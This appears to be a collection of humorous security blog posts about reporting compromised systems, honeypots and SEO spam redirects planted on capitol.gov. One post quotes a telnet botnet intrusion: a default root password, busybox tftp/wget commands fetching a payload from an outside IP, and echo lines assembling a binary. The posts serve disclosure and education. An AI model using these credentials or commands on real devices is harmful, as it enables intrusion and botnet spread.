Seriously? “Listen carefully?” You have four frickin’ options… it ain’t rocket science.

Unfortunately, none of those even begin to apply to the task at hand. I’m here to report a compromised machine.

I decide to try to do an end run on the whole “automated-attendant” BS and dial “0.”

“We’re sorry you’re having trouble. Goodbye” [click]

What the hell…?

I call back to be greeted by the same warning about the wholly ephemeral nature of their menu options. I find myself vaguely hoping that they’ll have changed since my last call, 30 seconds ago.

No such luck.

This time, I press “3” because in some twisted way my mission is peripherally “support-like.”

The woman who answers the phone just exudes “cranky” vibes.

This will not end well.

“What clinic are you with?”

“Well, I’m not actually with a clinic, and you’re probably the wrong person to talk to, but your phone menu didn’t give me a lot of options. I’m hoping that you can direct me to the right person.”

Literally, crickets.

“Ok, then… I need to speak to someone in your IT department about a computer owned by your company. It appears to be compromised.”

Again, crickets.

“Hello?” I’m afraid she may have dozed off.

“Yes. What clinic is this machine located in?”

“Well… I.. uh… I don’t know. I don’t know if it’s located in a clinic. I think it’s one your company’s systems.”

“Then what clinic are you calling from.”

“I’m not from a clinic. I’m calling about one of your company’s computers. It appears to be compromised… hacked… and it’s attacking other systems on the Internet.”

“The Internet?”

“Yes, ma’am.”

“Please hold.”

Dead air. I’m not entirely sure what about my mention of the Internet caused her to need to put me on hold. Perhaps it’s company policy - “If someone calls and mentions the Internet, immediately put them on hold.” That seems unlikely.

Perhaps she’s getting someone else. Maybe I’ll be transfered to an “Attacking the Internet” specialist. I cross my fingers and wait.

“Hello?” Nope. It’s her again.

“Yes?”

“You said that you’re calling about a computer?”

“Yes.”

“And you said it’s OUR computer?”

“Yes. It thinks it’s part of something called BLAH-BLAH-BLAHcloud.com. Is BLAH-BLAH-BLAHcloud something to do with your company?”

“Please hold.”

Dead air. Obviously this woman has several trigger words including both “Internet” and “cloud.” Oddly those are MY trigger words as well. Perhaps we’re kindered spirits. I consider mispronouncing “nuclear” as “noo-cue-lur” just to see if that bothers her too, but I’m at a loss as to how to work it into the conversation.

“Sir…?” She’s back…

“Yes?”

“Why are you contacting support about this?”

“Because there are four options on you phone menu. I don’t know my party’s extension. I don’t know a name to dial. So it was down to ‘support’ or ‘sales.’ It was a coin flip.”

“Please hold.”

What in the hell can she be doing that she needs to keep putting me on hold? Vaguely, I picture a bunch of bespectacled people in lab coats standing around a solitary phone, clipboards in hand, conferring in whispered tones and acting out some twisted psychological experiment designed to somehow turn me impotent. But I digress…

“Sir…?”

“Yes?”

“I’m going to create a support ticket for your issue and have someone from our IT department give you a call”

Holy hell… did she just say something reasonable? Where did that come from?

“I’ll need to get some details from you. What is your name?”

I give it to her.

“And your phone number?”

I give it to her, flabbergasted that a conversation that I’d, essentially, written-off was actually going somewhere.

And that’s when it happened:

“Ok… And what clinic are you with?”

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
July 5, 2016

I was the one doing the testing… and I’m always careful.

Imagine his surprise when he found out how incredibly easy InGuardians was to hack…

nce upon a time, a noble knight of the InGuardians clan was asked by a client to perform a penetration test against that client’s network. Late one afternoon, the noble knight began his testing, and lo!, there was much 0wnage to be had.

While the knight was doing his heroic deeds, little did he know that a plan was hatching in the mind of one of the client’s minions. “Those knights aren’t nearly as cool as everyone makes them out to be,” thought the minion, “I believe I shall try to show them up.”

Now the noble knight had been required by the client to provide details describing the “location” from whence his testing would proceed. Thus, the minion - armed with this knowledge - did plan a counter-attack against the knight, thinking that the knight would be using some type of “Live CD” to do his testing.

nd it came to pass that the minion attempted to log into the knight’s system via “ye olde SSH” in a vain attempt to disprove the rumors of the knight’s coolness.

Unfortunately for the minion, he forgot that knights always wear armor.

Thus, due to a truly awesome network / routing setup on the part of the knight, when the minion “hacked back” at the knight’s location, the minion did find himself logged in as “root” on what appeared to be the knight’s testing machine.

And there was much rejoicing - and giggling like a schoolgirl - as the minion began planning to reveal his treachery.

But, as he looked around, attempting to gather information on the knight’s system as proof of his superiority to the knight, the minion began to feel, more and more, that something was amiss. The system seemed oddly quiet… too quiet. In fact, it appeared that the minion was the only one logged in…

The minion logged off and then back on. All together, he logged into what he believed to be the knight’s machine three times, and issued many commands… but alas, everything seemed wrong.

lowly it began to dawn on the minion that perhaps things hadn’t worked out quite as well as he thought. He began to get the idea that he had stumbled into a trap.

He went to his master and slowly and fearfully admitted all that he had done. His master was - to put it mildly - displeased. Shocked at the stupidity of his minion, the master explained the concept of a “honeypot” and then ordered the minion to contact the InGuardians clan, make penance, and hope that the clan would be merciful.

he knights of the InGuardians clan are nothing if not merciful. They chided the minion but forgave him, telling him that they hoped he had learned a lesson.

And, to make the lesson perfectly clear to both the minion and his master, they showed the minion that the result of his treachery was forever etched into the fabric of the Internet by the Twittering of a bird.

And, once again, there was much rejoicing - this time by the Knights of the InGuardians clan.

Therefore, I beseech of you: Go forth and do good things - always remembering that every time you hack back, God kills a kitten.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 28, 2016

Thou shalt not chaseth ambulances.

Now being somewhat “old skool” in my way of thinking, I’m a little surprised that something like this even needs to be said.

Seriously.

According to Wikipedia (The Oracle of All Knowledge - Praise be… Praise be…), the term “ambulance chasing,” sometimes known as barratry, refers to a lawyer soliciting for clients at a disaster site. The term “ambulance chaser” comes from the stereotype of lawyers that follow ambulances to the emergency room to find clients.

Now, I spend an inordinate amount of my time at digital “disaster sites.” I contact lots and lots of folks who have had their websites hacked, and I generally do it in whatever is the most expedient way possible. I would rank “notification methods” as follows, from easiest to hardest:

• Twitter
• Facebook
• Email
• Phone calls

Unfortunately, tweeting, while fast and easy, is a bit “public.” Perhaps I need to rethink things.

Today, I fired off several tweets to notify some folks that they’d been hacked. Over the years, I’ve developed some pretty generic “notification language”:

A little while after firing off those tweets, I noticed that someone else had been paying attention:

Who is “Astra?” A quick look at their website shows that they sell a web application firewall targeted at PHP-based CMS solutions.

Now, I have no idea if their software is fifty shades of awesome or a total piece of crap. (It does, however, appear to come with a “Trust Seal” that you can display on your site… a total guarantee of awesomeness EVERY. DAMNED. TIME.) I really didn’t look into their product, because I first took a look at their tweet history. It screams “ambulance chaser.” (Actually, it screams “ambulance chaser with poor grammar,” but let’s not quibble…)

Right there, I know everything I need to about Astra.

So… I called them out on it:

“Security is best sold to people hacked.”

Uh, no… Security is “best sold” to people before they’re hacked. Security is “best sold” based on the merits of your product, not on the fact that, like a scavenger, you show up at the kill site before the body has even had time to cool. Quick-fix snake oil often gets sold to people right after they’ve been hacked. (Not that I’m saying Astra is snake oil… I honestly don’t know. They do have a “Trust Seal,” so there’s that…)

Here’s the thing: chasing ambulances is sleezy because its all too easy to take advantage of people who are already in a vulnerable place. Heck, even lawyers (who, let’s face it, aren’t generally known for their high ethical standards) look down on their peers who chase ambulances. In fact, rule 7.3 of the American Bar Association Model Rules of Professional Conduct specifically attempts to prohibit barratry.

If you’re in the security biz, you really SHOULD know and understand the sleeze-factor behind ambulance chasing. I notify people they’ve been compromised nearly every day, and I’ve been implicitly and explicitly accused of all manner of things, but I’ve never felt more hurt than when someone says “Oh, I suppose you want to sell me something to fix this…”

No.

No, I don’t.

You see, my goal is to live a professional life that - at minimum - meets or exceeds the American Bar Association Model Rules of Professional Conduct.

Because as “bars” go, the Bar’s bar is pretty low.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 25, 2016

• The refrigerator/freezer in our barn died while we were away, and instead of cooling, it decided to raise the food it stored to something slightly higher than room temperature
  • This situation created what can only be described as an “incredibly unique” smell
  • I also learned that a frozen turkey, enclosed in that sort of nifty shrink-wrap covering, “out-gases” enough after a few days at room temperature to resemble, ironically, a Macy’s Thanksgiving Day Balloon.
• An odd package in the mailbox
  • It was unexpected, lumpy, and from somewhere I didn’t recognize
  • Did I mention it was lumpy?

I opened it:

Hey… look at that… someone out there actually appreciates the things I do to try to clean up the Internet.

Notifying people that their systems are compromised is a pretty thankless job most of the time but, now, I’ve been singled out for special recognition by a… well… a potato.

I strutted around a bit.

Seriously. Strutted.

Why not? I was appreciated…!

I was appreciated by someone with a fetish for root vegetables, but appreciated none-the-less.

I was cool…

My lovely wife, ever at the ready to keep me from getting too full of myself, brought me back to earth: “Why is there a potato with writing on it sitting on the desk in the den?”

Ok… maybe “cool” was an overstatement.

While she could diminish the “coolness-factor” of the medium of its expression, she could not diminish the import of the recognition.

That, fell to my daughter…

Skip ahead a day to find me answering a call from my eldest daughter, Mary. We talked for a bit about our vacation, I told her about turkey balloons, and then related the latest chapter in the saga of an item that I’ve been trying to purchase for some time, but that seems doomed to never happen. Right before vacation, I finally received the item, only to discover that it had gotten broken in shipment.

Mary: Wow… that’s not good. So… it was pretty mashed?

TL: Well, not really “mashed.” Just sort of broken…

Mary: The UPS driver must’ve been pretty baked to have broken it like that…

TL: “Pretty baked?” Who are you?

Mary: I’m just sayin’… To throw the box around and totally fry the contents…

TL: “Mashed?” “Baked?” “Fried?” Since when have you become little Miss Slang? Why are you making… references… to… potatos………..?

Yes… that’s when the other mental shoe dropped.

How does this relate to security?

For me, it serves as a perfect reminder that getting “social engineered” isn’t so much about what someone else does as it is about our own expectations, desires, and insecurities.

Oh… and, dear daughter, always remember: payback is a bitch.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 22, 2016

As much respect as I have for Chris (and for other, lesser known folks who have written books about NSM) they all - unfortunately - have it wrong.

You see, according to them you’re - apparently - supposed to actually be DOING something about monitoring your network… Really? REALLY!?!?

How quaint.

Doing something to monitor your network is SO twentieth century. It’s time these authors dropped their throwback mentality and stepped into the era of Modern Network Security Monitoring (MNSM).

Chris and Richard and a whole lot of other people talk about these “packet” things like… well… like they’re something real. They encourage you to “capture” them, “log” them, or “monitor” them as if such meaningless activity will actually accomplish something useful. What balderdash!

I’m here to tell you that looking at the traffic on your network is nothing but a complete waste of your time. And time, as we all know, is money.

Why, pray tell, should we be expending time, effort, and money looking for these mythical “packets” when we have real work to do? I speak, of course, about advertising.

How can people know about the wonders of our sooper-dooper VPS hosting with cPanel / Parallels-Plesk / 100% Uptime Guarantee / Super-FAST SSD / 3TB transfer that you can stand up in 3 DAMN SECONDS FLAT for the low-low price of ONLYTHREEFRICKIN’NINETYFIVE a month if we spend our time monitoring our networks instead of advertising our NEW! LOWER! PRICES???

How can we possibly undercut those evil OTHER GUYS (that just lowered their price to ONLYTHREEFRICKIN’NINETYTHREE a month) if we spend money to actually monitor what’s happening on our network?

There is, however, some good news… Using the proven techniques of MNSM, we can leverage the awesome power of the Internet to monitor our network FOR us. Here’s how: Create an abuse@ email alias or - even better - a “report abuse” web page on your corporate site and simply kick back and wait.

Sure, we’re allowing any miscreant that can scrape together enough spare change to buy a Happy Meal™ to have their very own server on the Internet. Sure, a lot of them have larceny at heart or are clueless to the point that they’re going to use “password” for their password. Sure, that’s going to likely cause a LOT of abusive outbound traffic.

But we’re covered. Totally covered.

The Internet has our back. The folks out there who actually monitor their networks for attacks will let us know about the most egregious violators on our network. They are our NSM - and they’re free.

We just need to watch that email address (or the output from that web page) and when the complaints about a certain IP address reach a high watermark (or we’re feeling particularly frisky because we just lowered our price to ONLYTHREEFRICKIN’NINETYONE a month… suck it, evil OTHER GUYS) we can fire off an email to a client telling them to knock off the crap or we’ll ban ‘em.

Then we can go back to counting our money…

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 20, 2016

If you leave a hacker a default password,

Once he’s logged into your telnet server,

host login: root
Password: vizxv

He’ll try to download something via TFTP,

# busybox tftp 185.xx.xxx.xxx -c get bin.sh
tftp: applet not found

# busybox wget 185.xx.xxx.xxx -c get bin.sh
wget: applet not found

That won’t work either, so he’ll resort to creating a file all by himself.

# echo -en '\x7f\x45\x4c...\x01\x00\x00\x00\xa4\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV
# echo -en '\x01\x00\x34...\x28\x00\x06\x00\x05\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV
.
.
.
# echo -en '\x00\x00\x00...\x01\x00\x00\x00\x00\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV

Once its running, it’ll download another one of the hacker’s files.

Once it’s running, it will start attacking other systems on the Internet.

If the code attacks Tom’s Telnet Mirror™, it’ll redirect the attack right back to your system.

host login: root
Password: vizxv

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 6, 2016

Knowing that hackers had somehow been mysteriously inspired to place links back to SpeedyPaper on the U.S. Capitol’s virtual tour site, I wondered if that mystical, magical spell that SpeedyPaper unwittingly cast over the sKr1pt K1dz might have claimed other victims.

Note: I can’t even get my kids to pick up their frickin’ laundry…

Note 2: I must apologize. SpeedyPaper has said that it was a “competitor” who somehow inspired those hacks.

Anyway, doing a bit more digging, I rather quickly found more sites. I’m in the process of attempting to contact several, but here are two (that I’ve already contacted) that bothered me the most:

http://navyleague.org - Founded in 1902 with the encouragement of President Theodore Roosevelt, the Navy League has provided a powerful voice for a stronger sea service to Congress and to the American people. The Navy League has grown into the foremost citizens’ organization to serve, support and stand with all the sea services – the U.S. Navy, U.S. Marine Corps, U.S. Coast Guard and U.S.-flag Merchant Marine.

When violating the U.S. Capitol site to make a buck isn’t shitty enough, feel free to screw with the military.

Seriously… how do people like this sleep at night? What do you tell your kids you do for a living?

Johnny… Susie… Daddy runs a business that hooks-up spoiled, over-indulged, rich kids with pre-written term papers so they can party rather than study in school and still get good grades. Additionally, my very presence on earth inspires Internet miscreants to - out of the goodness of their hearts - hack into websites operated by our government and service organizations supporting our military and (of their own volition) place SEO-boosting advertisements for my company. Apparently, my complete lack of scruples regarding the sanctity of our educational process (earning a degree? how bourgeois!) also extends to those I inspire - reinforcing their complete lack of morality when it comes to property rights. Aren’t you proud of daddy?

Johnny and Susie spend the rest of their lives in therapy.

THE END

http://skylinechili.com - I… I… I… Words cannot express the anger and utter revulsion that boils up inside of me when I think of the violation that this represents. Screw the Capitol (well… no… that’s not right, but you know what I mean…) THIS is perhaps the most revolting desecration of the American way of life I can imagine. SKYLINE-FRICKIN-CHILI?!?!? You bastards. You dare to profane Skyline Chili?!?!? Now you’re messin’ with ‘Merica.

Disclaimer: I was born and raised in Ohio - the Home of Skyline Chili (I believe that’s on the license plates…). Within the borders of Ohio, this would be considered the most mortal of sins. Trust me.

A Moral Tale of Temptation and Consequences

Many years ago, a close friend of mine and I were approached by a gentleman who we knew through a program we attended with our children at the local YMCA. He knew that I worked in security and that both my friend and I programmed, and he asked if he could meet with us one evening to discuss hiring us to do some work for his company. When the appointed evening came, my friend and I were greeted at the front door of an incredibly beautiful home - tastefully decorated and appointed with lots of “high-end” touches. After sitting with this gentleman and his lovely wife for a bit and getting acquainted, he eventually asked us to adjourn to his home office to “discuss business.”

I should have gotten a clue when he closed and locked the office door.

You see, the job that our acquaintance wanted us to perform was to create a cryptographically sound “token” system to use for his business: interactive live video streaming of… well… people… female people… doing various… things. Our “friend” was losing “clients” because credit card processing for individual video “sessions” was cumbersome. If a “session-time” expired before… well… a client did, pulling out the ol’ credit card and typing in a bunch of digits probably killed the mood. His idea was to have clients pre-purchase various quantities of “tokens” (with appropriate discounts for buying in bulk… exactly like Costco! Ok… maybe not exactly like Costco…) making the whole process of “extending time”… and other things… work a whole lot smoother.

Now, I must admit, the idea itself was actually pretty intriguing. It was filled with all sorts of incredibly interesting technically-challenging work. The “remuneration” numbers he was tossing around weren’t too shabby, either.

But… my mind kept getting pulled back to that locked door.

Here was a man who was - yes - providing for his family, but who was so totally ashamed of what he did for a living that he kept it closed off from everyone he knew - hiding it behind a locked door.

His wife didn’t know, his parents and siblings didn’t know… and the little girl asleep upstairs in her room didn’t know.

He lived in agonizing fear of them ever finding out… and he always locked the door to his office.

Those of us who work in security walk along a lot of lines. We’re deeply aware, perhaps more so than in any other profession, of what happens to those who make the error of stepping across those lines.

I joke around and make fun of a lot of things on this site - ‘cause that’s just how I am - but I’m serious about this: Don’t cross that line…

And tonight, spend some time telling your kids about all the good things you do.

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter (yes, I know… X): @tliston
June 3, 2016

Mine is, I’ll admit, probably a bit odd. I collect justice… or at least the small morsels of justice I’m able to eek out of this increasingly unjust world.

My justice “collection” includes - quite literally - hundreds of websites, servers, and systems that I’ve managed - over the years - to get “unhacked” by notifying the folks who own them and, as a result, taking them away from the folks who… well… 0wn them.

At times, it becomes soul-sucking drudgery - I feel like a modern day Cassandra, telling the truth to people who just don’t want to hear. Today, however, wasn’t one of those days. Today was FUN.

In the mornings, I fire up my little Chromebook and check the news, look at Twitter and Facebook, and then generally just putz around a bit on the ‘Net while everyone else is waking up and getting ready. One of my favorite “putzing around” activities is to fire off random Google searches to see what interesting stuff I can find. If you know what you’re doing, you can find lots of interesting things.

One of Google’s most under-rated features is the ability to search for specific content across a single site, or an entire Top Level Domain (TLD… i.e. all of the sites under .com, .net, .org, etc…) using the “site” keyword. For example, this morning, I fired off the following search:

site:.gov cheap buy online

That search looks for pages containing the words “cheap,” “buy,” and “online” within the .gov TLD.

The third “hit” within the search results looked like this:

Seriously? The Capitol’s website? Aw, hell…

I changed my search to:

site:capitol.gov

and found that there were dozens of “pages” added to the site selling term / “research” papers. (Note: they’re not really pages… they’re just a bunch of HTTP 307 Temporary Redirects that I believe are created by alterations to the code within the site… more on this later)

I followed several of the links and found that they would round-robin me to a couple of different sites:

Test #1

GET http://capitol.gov/init.php/essay-my-country/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 7978.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.104 Safari/537.36
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __utma=233380364.798512421.1464786413.1464786413.1464786413.1; __utmc=233380364; __utmz=233380364.1464786413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

HTTP/1.1 307 Temporary Redirect
 Redirect to: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=capitol.gov&utm_referrer=http%3A%2F%2Fcapitol.gov%2Finit.php%2Fessay-my-country%2F&utm_keyword=essay+my+country
Server: nginx
Date: Wed, 01 Jun 2016 13:15:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 20
Connection: keep-alive
Location: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=capitol.gov&utm_referrer=http%3A%2F%2Fcapitol.gov%2Finit.php%2Fessay-my-country%2F&utm_keyword=essay+my+country
X-Powered-By: PleskLin
Vary: Accept-Encoding
Content-Encoding: gzip

Test #2

GET http://capitol.gov/init.php/walmart-research-papers/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 7978.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.104 Safari/537.36
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __utma=233380364.798512421.1464786413.1464786413.1464786413.1; __utmb=233380364.5.10.1464786413; __utmc=233380364; __utmz=233380364.1464786413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

HTTP/1.1 307 Temporary Redirect
 Redirect to: https://essayfactory.uk/?ref_id=1076
Server: nginx
Date: Wed, 01 Jun 2016 13:34:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 20
Connection: keep-alive
Location: https://essayfactory.uk/?ref_id=1076
X-Powered-By: PleskLin
Vary: Accept-Encoding
Content-Encoding: gzip

Sonofabitch…

Normally, this is the time that I would fire off an email or a tweet to the folks running the capitol.gov website and go about my day having a little less faith in humanity. Seriously!?!? They hacked the Capitol’s website just to make a frickin’ buck off of “research papers.”

I decided to do a little checking into SpeedyPaper and EssayFactoryUK. Turns out, they both have Twitter accounts, and while the EssayFactory one is pretty much unused, the SpeedyPaper account is very active.

I was more than a little peeved at what I’d found, so I decided to call the SpeedyPaper people out – at the same time I was letting the U.S. Capitol folks know that they’d been 0wned.

After a few minutes, the SpeedyPaper people actually responded:

Now, far be it from me to be to call into question the moral character of someone who makes their living selling term / “research” papers on the Internet, but I did find myself wondering exactly what kind of “checking” they might be doing…

It didn’t take long to find out… and just for fun, I’m going to attempt to caption what I believe the thought process was behind the “moves” I saw taking place.

Disclaimer: I can’t possibly know what the people at SpeedyPaper were thinking. Hell, I can’t even claim to know THAT they were thinking. This can, at best, be considered a work of really crappy near-term historical/speculative fiction.

Scene: Someone’s dank, musty basement. In the background, 1,000,000 monkeys sit, pounding away at typewriters and flinging their feces. A man of indeterminate age sits alone, shrouded in shadows, speaking aloud - either to himself, or the monkeys:

SpeedyPaper : Holy crap! This incredibly insightful and likely extremely good-looking “tliston” fellow has pointed out that we are the direct SEO beneficiaries of, literally, dozens of hacked links on the U.S. Capitol’s website. It’s quite possible that the Government may become more than a bit miffed at us. We must DO something!

GET http://capitol.gov/init.php/dissertation-byu/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 7978.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.104 Safari/537.36
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __utma=233380364.798512421.1464786413.1464786413.1464786413.1; __utmb=233380364.5.10.1464786413; __utmc=233380364; __utmz=233380364.1464786413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

HTTP/1.1 307 Temporary Redirect
 Redirect to: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=capitol.gov&utm_referrer=http%3A%2F%2Fcapitol.gov%2Finit.php%2Fdissertation-byu%2F&utm_keyword=dissertation+byu
Server: nginx
Date: Wed, 01 Jun 2016 13:37:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 20
Connection: keep-alive
Location: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=capitol.gov&utm_referrer=http%3A%2F%2Fcapitol.gov%2Finit.php%2Fdissertation-byu%2F&utm_keyword=dissertation+byu
X-Powered-By: PleskLin
Vary: Accept-Encoding
Content-Encoding: gzip

GET https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=capitol.gov&utm_referrer=http%3A%2F%2Fcapitol.gov%2Finit.php%2Fdissertation-byu%2F&utm_keyword=dissertation+byu
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 7978.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.104 Safari/537.36
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=d26ddac4638670fc8878c739a1861237c1464786359; spu=eyJpdiI6IlNORkNWUXJcL1ZJQ0hUT1wvd0dDVWVFdz09IiwidmFsdWUiOiJZK1dQZ3cwV1NTbjI2MVBhMWxkdkx3PT0iLCJtYWMiOiI5NDc4MGY0MzBhMzEwZTUzODQ0NjhkYTEwMmY5MjAwNzJlMTgyZGU0MDg4MjAzOThmMmY0NmFjODkwYzk5NTRhIn0%3D; spv=eyJpdiI6Ilk0SXNtZnhTZHgzMFpzaGc2bnZjcGc9PSIsInZhbHVlIjoiYkFnamV3OEYwcnp2ekJwdTVLSEF6Zz09IiwibWFjIjoiYmU4ZTExOWYzOTA5MGEwNTRjNzlkYTY2NTZmMzQyNDU1NjkzYWQ1OGU2NDE5NGE2ODQ4NDMxY2Y3ZDQ4YzkwOSJ9; spvis=eyJpdiI6IjZtaWU2SmROcFBjaWRpcWJaekY2OVE9PSIsInZhbHVlIjoiTXl3SjZPS0xQZ284T0g2K29ENDh6UT09IiwibWFjIjoiYjc3MDE5ODFlNWZlNDBmNTE1ZDJlMGYxNjFmMWU1NDEwODM3ODQ2NmI0MTIzMDA4ZDRmN2I1YTE4NjRjZmJhOCJ9; laravel_session_speedypaper=eyJpdiI6Ik5EdWJxcGZPZDlOcFJ0Z252S2drZ3c9PSIsInZhbHVlIjoibTE5QzVQRW9ST1wvYUJtZWNZa2w0VTBybUZGU2RlN0hPWmhLeVN4bTloUVRmdlwvNEJTWUZOVGJGeVFUMVd0RUtaUlVQN1NwVytcL2VENndIRjhKVlIrcFE9PSIsIm1hYyI6ImNkMmYyZjJjZDczZmE1NTA1OTY0ZGI0NTJlM2QwMGFmN2Q3NDk4NDUzN2FiNGVhYTRlMGI1NGNkMjk2YjU4MGQifQ%3D%3D

HTTP/1.1 302
 Redirect to: https://7essays.com/
status: 302
date: Wed, 01 Jun 2016 13:37:01 GMT
content-type: text/html; charset=UTF-8
cache-control: no-cache
location: https://7essays.com
set-cookie: laravel_session_speedypaper=eyJpdiI6IjZ5eitRSk0wRWt3dU1tQzMwUEFNQ2c9PSIsInZhbHVlIjoielVTN05ZS01nY3VFWTU0cGVodmJjN0g1T0krN2hJcDlPa3RZb2h4N2JLSk44MTZsNytsU095TWhmQnZLRjRXY0JjdVBZemgxV0JnYkF5dFB3dFc0b3c9PSIsIm1hYyI6IjNmN2FjZTQxMmRlOTEyNzBiOTc4YzY0MmQ0NWZmY2ZhMmE2YTg4NjUwN2Q2M2FjODZkYjI1ZjBlOTkyODJjZWUifQ%3D%3D; expires=Wed, 01-Jun-2016 15:37:01 GMT; Max-Age=7200; path=/; httponly
x-prerender-token: fbDlD1S9rFH3au9KfiDK
strict-transport-security: max-age=63072000; includeSubdomains;
x-content-type-options: nosniff
server: cloudflare-nginx
cf-ray: 2ac30ed1006f10c9-ORD

Wait… wut? Did they just… redirect to some other term / research paper company? Was this a really crappy gambit at shifting the blame? If so, then that’s mighty suspicious behavior on the part of a company that will (in the very near future) claim that THEY are the victims here. Note: I never saw this behavior prior to them “checking” on things, but if it did exist, then their claim of victimhood becomes even more unbelievable…

I believe that things then proceeded thusly:

SpeedyPaper: Wait! What could we have been thinking! Redirecting these links to another term paper company is wrong! Not only is it wrong, but it might appear suspicious. Think, think, think… I’ve got to think! WOULD YOU DAMNED MONKEYS SHUT UP!?!? What shall we do? I know! Let’s redirect right back to the Capitol’s website… that will make everything better!

GET http://capitol.gov/init.php/essay-my-country/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 7978.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.104 Safari/537.36
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __utma=233380364.798512421.1464786413.1464786413.1464786413.1; __utmc=233380364; __utmz=233380364.1464786413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

HTTP/1.1 307 Temporary Redirect
 Redirect to: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=capitol.gov&utm_referrer=http%3A%2F%2Fcapitol.gov%2Finit.php%2Fessay-my-country%2F&utm_keyword=essay+my+country
Server: nginx
Date: Wed, 01 Jun 2016 13:41:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 20
Connection: keep-alive
Location: https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=capitol.gov&utm_referrer=http%3A%2F%2Fcapitol.gov%2Finit.php%2Fessay-my-country%2F&utm_keyword=essay+my+country
X-Powered-By: PleskLin
Vary: Accept-Encoding
Content-Encoding: gzip

GET https://speedypaper.com/?rt=3S5do2ix&utm_search_engine=google&utm_host=capitol.gov&utm_referrer=http%3A%2F%2Fcapitol.gov%2Finit.php%2Fessay-my-country%2F&utm_keyword=essay+my+country
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 7978.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.104 Safari/537.36
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
